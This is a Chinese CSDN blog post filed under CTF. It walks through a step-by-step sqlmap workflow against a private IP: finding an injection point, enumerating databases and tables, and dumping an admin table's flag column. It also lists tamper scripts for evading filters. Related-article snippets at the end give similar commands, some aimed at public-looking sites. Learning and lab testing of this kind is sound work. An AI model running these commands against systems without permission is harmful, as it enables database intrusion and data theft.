sqlmap使用一般流程

最新推荐文章于 2024-09-10 10:00:13 发布
最新推荐文章于 2024-09-10 10:00:13 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: CTF 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zss192/article/details/104144885
版权

一般流程

1.检查注入点:
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” --batch
2.爆所有数据库信息:
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” --dbs --batch
3.爆当前数据库信息:
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” --current-db --batch
4.指定库名列出所有表
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” -D news --tables --batch
‘news’ 为指定数据库名称
5.指定库名表名列出所有字段
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” -D news -T admin --column --batch
‘admin’ 为指定表名称
6.指定库名表名字段dump出指定字段
sqlmap -u “http://192.168.0.182/” --data “word=1&number=5” -D news -T admin -C flag --dump --batch

说明
-D 数据库名(database首字母)
-T 表名(table首字母)
-C 列名称(column首字母,可加多个参数,如-C “content,title,id”
data=“word=1&number=5” 数据字符串通过POST发送
batch 永远不要要求用户输入,使用默认行为

–technique:
B: Boolean-based blind SQL injection(布尔型注入)
E: Error-based SQL injection(报错型注入)
U: UNION query SQL injection(可联合查询注入)
S: Stacked queries SQL injection(可多语句查询注入)
T: Time-based blind SQL injection(基于时间延迟注入)
-v3 同时显示注入的payload。

–tamper base64encode.py 让发送的数据先转换成base64
unmagicquotes.py 宽字节注入脚本
nonrecursivereplacement.py 双重语句替代预定义的sql关键字,往往需要更改下
randomcase.py 随机大小写
space2comment.py 将空格替换为/**/

夏日 の blog
关注
专栏目录
分析 sqlmap 的基础流程
qq_42801460的博客
03-22 138
关于其具体的行为,其实大可不必太过关心,因为我们其实并不需要具体的处理细节,这些细节应该是在我们遇到问题,或者遇到唔清楚的地方再跳出来在这些步骤中寻找,并且进行研究。在本系列文章中,我们主要针对 sqlmap 的最核心的方方面面进行分析,本文主要针对基础流程进行介绍与描述,本文由非常细致的 sqlmap 源码解读,希望有需要的读者可以从中受益。根据说明,这是直连数据库的选项,所以我们可能暂时并不需要关心他,我们暂时只关注 sqlmap 是如何检测漏洞的,而不关心他是怎么样调用数据库相关操作的。
Sqlmap使用手册中文版
01-13
学习使用Sqlmap,除了阅读其官方文档和用户手册,还可以配合像sqli-labs这样的实验系统进行实践。用户手册详尽地介绍了Sqlmap的所有选项和开关,提供了丰富的实例,帮助用户理解和掌握如何有效使用这个工具。 当...
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 5万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
shanguicsdn111的博客
09-10 5987
提示:SQLmap不能直接「扫描」网站漏洞,先用其他扫描工具扫出注入点,再用SQLmap验证并「利用」注入点。检测「post请求」的注入点,使用BP等工具「抓包」,将http请求内容保存到txt文件中。参数,指定需要检测的url,单/双引号包裹。风险级别(0~3,默认1,常用1),级别提高会增加数据被篡改的风险。搜索数据库中是否存在指定库/表/字段,需要指定库名/表名/字段名。就是 all 的意思,获取所有能获取的内容,会消耗很长时间。指定目标「数据库」,单/双引号包裹,常配合其他参数使用
sqlmap简单的使用步骤
xyx107的博客
03-02 923
sqlmap用于sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。1、检测注入GET注入sqlmap -u “http://www.vuln.cn/post.php?id=1″ 默认使用level1检测全部数据库类型sqlmap -u “http://www.vuln....
Sqlmap 一般注入流程
西西工作室
11-19 936
Sqlmap: 一般注入流程sqlmap -u “www.ONDragon.com/ONDragon?id=1” --dbs   查看所有数据库 sqlmap -u “www.ONDragon.com/ONDragon?id=1” --current-db 查看当前数据库 sqlmap -u “www.ONDragon.com/ONDragon?id=1” --user 查看数据库用户名 sqlmap -u “www.ONDragon.com/ONDragon?id=1” --cur
SQLMAP 的基本使用步骤
qq_51768842的博客
05-09 1055
sqlmap是一个自动化的SQL注入工具,主要功能是扫描,发现并利用漏洞。sqlmap的功能包括数据库指纹识别,数据库枚举,数据提取等等,并在获取完全的操作权限是执行任意命令
sqlmap工作流程
weixin_33737774的博客
05-07 365
转载于:https://www.cnblogs.com/cyjaysun/p/4485267.html
SQLmap使用手册1
08-03
SQLmap 是一个自动化的SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员有效地发现和利用这些漏洞,从而评估网站的安全性。以下是关于SQLmap的详细信息: **...
sqlmap使用总结1
08-03
10. **实战技巧**:在实际使用中,了解不同场景下如何调整参数、理解不同注入模式的原理以及如何绕过防御机制,是提高SQLMap使用效果的关键。 总之,SQLMap是一个功能强大的工具,它的高效性和灵活性使得它在渗透...
sqlmap详细使用教程
m0_55854679的博客
12-28 9564
文章目录简介SQL注入流程命令参数拓展 简介 Sqlmap是一个自动化检测和利用SQL注入漏洞的免费开源工具,对SQL注入漏洞进行检测的最佳工具 支持对多种数据库进行注入测试,能够自动识别数据库类型并注入 支持多种注入技术,并且能够自动探测使用合适的注入技术 如:布尔盲注、时间盲注、联合查询注入、报错注入、堆查询注入 能够爆破数据库信息,如用户名,密码 能够自动识别哈希密码,并且使用密码字典进行破解. SQL注入 原理:SQL注入攻击指的是用户输入了特殊的数据拼接到原本程序的代码中
sqlmap 基本使用步骤(一)
weixin_30555125的博客
07-11 282
列出数据据信息:python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --dbs 列出当前数据库信息:python sqlmap.py -u "http://ctf5.shiyanbar.com/web/index_3.php?id=1" --current-db 列出所有库的表信息:python sqlm...
sqlmap 基本使用步骤(二)
weixin_30505225的博客
11-30 203
post------------------------------------------------------------------1、使用 -rpython sqlmap.py -r post.txt post.txt是原始的http请求: POST /vuln.php HTTP/1.1Host: www.target.comUser-Agent: Mozilla/4.0 id=...
sqlmap基本使用方式(非常详细)零基础入门到精通,收藏这一篇就够了
Javachichi的博客
03-13 2844
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。会清空之前的session,重新测试该目标。
一次使用SQLMAP的过程
子曰小玖的博客
06-14 549
url:http://www.microtek.com.cn/happystudy/happystudy_info.php?idnow=4 第一步: -u 注入地址 --dbms "Mysql" --current-user 获取当前用户名 [root@Hacker~]# Sqlmap-uhttp://www.microtek.com.cn/happystudy/happystudy...
SQL注入自动化工具sqlmap使用教程
1. 自动化检测:sqlmap能够自动检测Web应用程序中SQL注入漏洞的存在。 2. 数据库指纹识别:通过特定的SQL查询,sqlmap能够确定后端数据库服务器的类型和版本。 3. 数据提取:它能够从数据库中提取用户、密码、数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值